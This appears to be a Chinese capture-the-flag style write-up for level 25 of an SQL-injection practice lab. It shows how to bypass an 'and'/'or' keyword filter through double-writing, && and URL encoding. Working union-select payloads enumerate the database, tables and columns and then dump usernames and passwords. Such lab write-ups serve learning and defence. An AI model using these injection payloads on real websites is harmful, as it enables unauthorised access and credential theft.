当前位置: 首页 > wzjs >正文

寿光 网站建设建文帝网站建设

寿光 网站建设,建文帝网站建设,网站维护企业,wordpress中途修改固定连接文章目录 前言一、回顾上一关知识点二、靶场第二十五关通关思路1、判断注入点2、爆字段个数3、爆显位位置4、爆数据库名5、爆数据库表名6、爆数据库列名7、爆数据库数据 总结 前言 此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的…

文章目录

  • 前言
  • 一、回顾上一关知识点
  • 二、靶场第二十五关通关思路
    • 1、判断注入点
    • 2、爆字段个数
    • 3、爆显位位置
    • 4、爆数据库名
    • 5、爆数据库表名
    • 6、爆数据库列名
    • 7、爆数据库数据
  • 总结


前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!


一、回顾上一关知识点

上一关是过滤了注释符,导致单引号不能被过滤掉而闭合,得通过构造and '1'='1or '1'='1在payload后面才能成功把多余的单引号闭合。这一关是过滤了and和or,让我们看看如何绕过。

二、靶场第二十五关通关思路

  • 1、判断注入点
  • 2、爆字段个数
  • 3、爆显位位置
  • 4、爆数据库名
  • 5、爆数据库表名
  • 6、爆数据库列名
  • 7、爆数据库数据

1、判断注入点

打开二十五关,发现是get提交的注入类型,老规矩用万能语句and 1=1和 and 1=2测试,发现回显正常,还发现语句返回页面的时候and被过滤了,这里说明这一关是过滤掉and和or了.( 如图所示)
在这里插入图片描述
为了进一步猜想是不是过滤了and和or我们看看源码,发现and和or被替换为空了(如图所示)
在这里插入图片描述
这里我们有三种方法绕过and,
第一种是双写and
因为它把and替换为空,而且只过滤一次。如果是anandd的话经过后端过滤应该变成and。
第二种是利用逻辑运算符
and对应的机器语言是&&,or对应的是||
第三种是用url编码
and对应的机器语言是&&,若&&无法绕过,可以试着利用&的url编码绕过,&&url编码为%26%26。当然&&能绕过更好。
绕过的方法有很多这里不多举例,这里我用双写绕过。
最终发现是单引号闭合,payload为(如图所示)

id=1' anandd 1=1--+
id=1' anandd 1=2--+

在这里插入图片描述
在这里插入图片描述

2、爆字段个数

发现4的时候报错,说明只有三个字段
payload为

id=1' oorrder by 4--+

在这里插入图片描述

3、爆显位位置

payload为

id=1' union select 1,2,3--+

在这里插入图片描述

4、爆数据库名

payload为

id=-1' union select 1,user(),database()--+

在这里插入图片描述

5、爆数据库表名

payload为

id=-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()--+

在这里插入图片描述

6、爆数据库列名

payload为

id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema=database() aandnd table_name="users"--+

在这里插入图片描述

7、爆数据库数据

payload为

id=-1' union select 1,group_concat(username),group_concat(passwoorrd) from users --+

在这里插入图片描述


总结

这一关是过滤了and和or,过滤的方法很多,有双写、url编码、&&绕过等等。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!


文章转载自:

http://90pKvJvc.bgrsr.cn
http://OBYLaGuT.bgrsr.cn
http://Icz82pCK.bgrsr.cn
http://iOcIbF43.bgrsr.cn
http://jMUvD6ci.bgrsr.cn
http://CLXICiiC.bgrsr.cn
http://l32jl8am.bgrsr.cn
http://yl6Sc7xA.bgrsr.cn
http://gZHda7ME.bgrsr.cn
http://ZGsoGZfo.bgrsr.cn
http://kMrSDDW1.bgrsr.cn
http://70s6NozH.bgrsr.cn
http://LhiNnBUV.bgrsr.cn
http://QlW4kml6.bgrsr.cn
http://hFfCGYq5.bgrsr.cn
http://Z7RbgZ1j.bgrsr.cn
http://AsrwRBT2.bgrsr.cn
http://URJrhYAI.bgrsr.cn
http://qRWq3dzY.bgrsr.cn
http://EEtVl8Ym.bgrsr.cn
http://HmiI1010.bgrsr.cn
http://wYbd36Kr.bgrsr.cn
http://DP8YFB0N.bgrsr.cn
http://b7igW1XK.bgrsr.cn
http://SMEl6sfu.bgrsr.cn
http://9L3756dL.bgrsr.cn
http://65hsKI1t.bgrsr.cn
http://ElHqm8CV.bgrsr.cn
http://1jEHxDc1.bgrsr.cn
http://qyJKloD8.bgrsr.cn
http://www.dtcms.com/wzjs/649219.html

相关文章:

  • 重庆彼客的网站是谁家做的网站建设优化服务精英
  • 建设银行网站开通查询密码网站备案有用
  • 网站设计教学自然人做音频网站违法吗
  • 企业应该如何进行网站推广教做宝宝衣服的网站
  • 微信做单网站有哪些微信网页制作的软件
  • 广州服务好的网站推广工具idc服务器租赁
  • 河南省住房城乡建设厅官方网站网站开发模块
  • phpstorm做网站做设计在哪个网站上找高清图片
  • 网站开发建设属于什么费用美工培训班要多少学费
  • 网络建站工具烟台学校网站建设
  • 上海闸北城市建设有限公司网站西宁企业网站建设
  • 昆明商城网站建设做个公司网站一般多少钱
  • 做网站运营有提成吗阜阳营销型网站建设
  • 太原建站推广石家庄pc端网站开发
  • 巴中微信网站建设深圳企业网站定做
  • 专业的网站开发建设公司上海学习网站建设
  • 网站备案是一年一次吗赣州新闻最新消息
  • 深圳沙井做网站wordpress rt视频教程
  • 做外贸要有英文网站吗在自己的网站里做讲课视频
  • 小红书网站开发形式选择全国企业查询网上查询
  • 中卫网站设计在哪里孟村县网站建设价格
  • 太仓市住房和城乡建设局网站中国专利查询系统入口
  • 微信公众号预约谷歌seo网络公司
  • 安徽教育平台网站建设设计9大软件
  • 北京网站制作人才横沥网站建设
  • wordpress的网站怎么让他上线网页设计工作内容怎么写
  • 怎么建网站做佛山网站建设外包公司
  • 石家庄制作网站公司有哪些海口网站建设策划方案
  • 建设网站需要数据库备份制作一个门户网站需要多少钱
  • 学做预算有网站吗官方小程序开发